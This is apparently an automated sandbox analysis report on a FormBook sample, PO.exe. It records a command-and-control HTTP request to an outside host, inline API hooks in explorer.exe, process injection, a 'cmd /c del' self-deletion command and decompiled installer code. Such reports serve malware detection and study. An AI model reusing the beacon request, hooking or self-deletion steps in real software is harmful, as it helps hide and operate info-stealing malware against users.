Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49694	44.227.76.166	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 12:10:33.100172997 CEST	334	OUT	GET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1 Host: www.phorice.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 12:10:33.269149065 CEST	335	IN	HTTP/1.1 307 Temporary Redirect Server: openresty Date: Thu, 08 Apr 2021 10:10:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 168 Connection: close Location: http://phorice.com X-Frame-Options: sameorigin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xEB

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: PO.exe PID: 5584 Parent PID: 5616

General

Start time:	12:08:28
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\PO.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO.exe'
Imagebase:	0x400000
File size:	228037 bytes
MD5 hash:	665CB19601850467AF3EE7D9FD0E0350
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: PO.exe PID: 5536 Parent PID: 5584

General

Start time:	12:08:29
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\PO.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\PO.exe'
Imagebase:	0x400000
File size:	228037 bytes
MD5 hash:	665CB19601850467AF3EE7D9FD0E0350
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 5536

General

Start time:	12:08:35
Start date:	08/04/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3980 Parent PID: 3472

General

Start time:	12:08:55
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x900000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1320 Parent PID: 3980

General

Start time:	12:08:58
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\PO.exe'
Imagebase:	0x1010000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4492 Parent PID: 1320

General

Start time:	12:08:59
Start date:	08/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: PO.exe PID: 5584 Parent PID: 5616 PO.exeCOMMON

Executed Functions

Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282
stringfilecomCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89); // executed
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\alfons\\Desktop\\PO.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\alfons\\Desktop\\PO.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\alfons\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\alfons\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\alfons\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}

0x00403153
0x00403156
0x0040315a
0x0040315f
0x00403164
0x0040316b
0x00403171
0x00403187
0x00403197
0x0040319c
0x004031a7
0x004031ad
0x004031b2
0x004031b4
0x004031da
0x004031da
0x004031e0
0x004031ee
0x00403202
0x00403207
0x00403209
0x0040320b
0x00403210
0x00403210
0x00403220
0x00403226
0x0040328f
0x0040328f
0x00403291
0x00403293
0x00000000
0x00000000
0x0040322c
0x0040322f
0x00403237
0x00403237
0x0040323a
0x0040323f
0x00403241
0x00403241
0x00403242
0x00403242
0x00403247
0x0040324a
0x0040327f
0x00403284
0x00403289
0x0040328c
0x0040328e
0x0040328e
0x0040328e
0x00000000
0x0040324c
0x0040324c
0x0040324d
0x00403250
0x00403258
0x0040325b
0x0040325d
0x0040325d
0x0040325d
0x0040325b
0x00403260
0x00403266
0x0040326e
0x00403271
0x00403273
0x00403273
0x00403273
0x00403271
0x00403276
0x0040327d
0x00403297
0x0040329b
0x004032a4
0x004032a9
0x004032aa
0x004032af
0x004032b3
0x00403316
0x00403316
0x0040331b
0x00403323
0x0040344e
0x00403455
0x00403471
0x0040347e
0x00403487
0x00403489
0x0040348b
0x0040348d
0x0040348f
0x00403491
0x00403493
0x004034a3
0x004034a5
0x004034a7
0x004034b4
0x004034c3
0x004034cb
0x004034d3
0x004034d3
0x004034a7
0x00403493
0x0040348f
0x004034d8
0x004034de
0x004034e0
0x004034e4
0x004034e4
0x004034e0
0x004034e9
0x004034ee
0x004034f1
0x004034f3
0x004034f3
0x004034fb
0x004034fb
0x0040332f
0x00403336
0x00403336
0x004032bb
0x00403306
0x00403306
0x00403312
0x00000000
0x00403312
0x004032c4
0x004032d1
0x004032c8
0x004032ce
0x00000000
0x00000000
0x004032d0
0x004032d0
0x004032d0
0x004032d5
0x004032d7
0x004032dc
0x00403342
0x0040334a
0x00403350
0x0040335f
0x00403361
0x0040336a
0x00403375
0x0040337f
0x00403387
0x00000000
0x00000000
0x004033b3
0x00000000
0x00000000
0x004033c9
0x004033d2
0x004033de
0x004033ee
0x004033e0
0x004033e6
0x004033e6
0x004033f9
0x00403403
0x0040340e
0x00403415
0x0040341b
0x00403422
0x00403429
0x0040342c
0x00403432
0x00403432
0x00403429
0x00403434
0x00403434
0x0040343a
0x0040343e
0x00000000
0x00403449
0x004032de
0x004032e1
0x004032ec
0x00000000
0x00000000
0x004032f4
0x004032ff
0x00403304
0x00000000
0x00403304
0x00000000
0x0040327d
0x00000000
0x00000000
0x00000000
0x00403231
0x00403231
0x00403231
0x00403232
0x00403232
0x00000000
0x00403231
0x00000000
0x00403295
0x004031bc
0x004031c8
0x004031d4
0x00000000
0x00000000
0x00000000

APIs

#17.COMCTL32 ref: 00403164
OleInitialize.OLE32(00000000), ref: 0040316B
SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187

Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC

GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8

Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137

DeleteFileA.KERNELBASE("C:\Users\user\Desktop\PO.exe" ), ref: 004031E0
GetCommandLineA.KERNEL32 ref: 004031E6
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PO.exe" ,00000000), ref: 004031F5
CharNextA.USER32(00000000,"C:\Users\user\Desktop\PO.exe" ,00000020), ref: 00403220
OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
ExitProcess.KERNEL32 ref: 00403336
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\PO.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
ExitProcess.KERNEL32 ref: 004034FB

Strings

LookupPrivilegeValueA, xrefs: 0040346B
Error launching installer, xrefs: 004032D7
C:\Users\user\AppData\Local\Temp, xrefs: 004032FA
C:\Users\user\AppData\Local\Temp, xrefs: 0040329F, 004032EF, 004033D7, 004033E0
AdjustTokenPrivileges, xrefs: 00403478
\Temp, xrefs: 004031C2
SeShutdownPrivilege, xrefs: 004034AE
~nsu.tmp\, xrefs: 0040333C
@y, xrefs: 0040335A
_?=, xrefs: 00403408
NSIS Error, xrefs: 0040318D
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040315A
NCRC, xrefs: 00403260
", xrefs: 00403242
C:\Users\user\AppData\Local\Temp\, xrefs: 0040319C, 004031A1, 004031BB, 004031C7, 00403341, 00403349, 0040335F, 00403420
ADVAPI32.dll, xrefs: 0040345B, 00403465, 00403470, 0040347D
"C:\Users\user\Desktop\PO.exe" , xrefs: 004031DA, 004031DF, 004031ED, 004032BE
OpenProcessToken, xrefs: 00403460
/D=, xrefs: 00403276
Au_.exe, xrefs: 0040336F, 00403434
_?=, xrefs: 004032C8

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\PO.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
API String ID: 3079827372-3278349945
Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x0040530c
0x00405310
0x00405319
0x0040531c
0x0040531f
0x00405327
0x00405329
0x0040532a
0x00000000
0x0040532a
0x00405339
0x00405339
0x0040533c
0x0040533f
0x00405353
0x0040535a
0x0040535f
0x00405361
0x00405371
0x00405363
0x00405369
0x00405369
0x0040537c
0x00405391
0x00405393
0x00405399
0x0040539c
0x0040539f
0x00405461
0x00405461
0x00405465
0x00405467
0x00405467
0x00405467
0x00405467
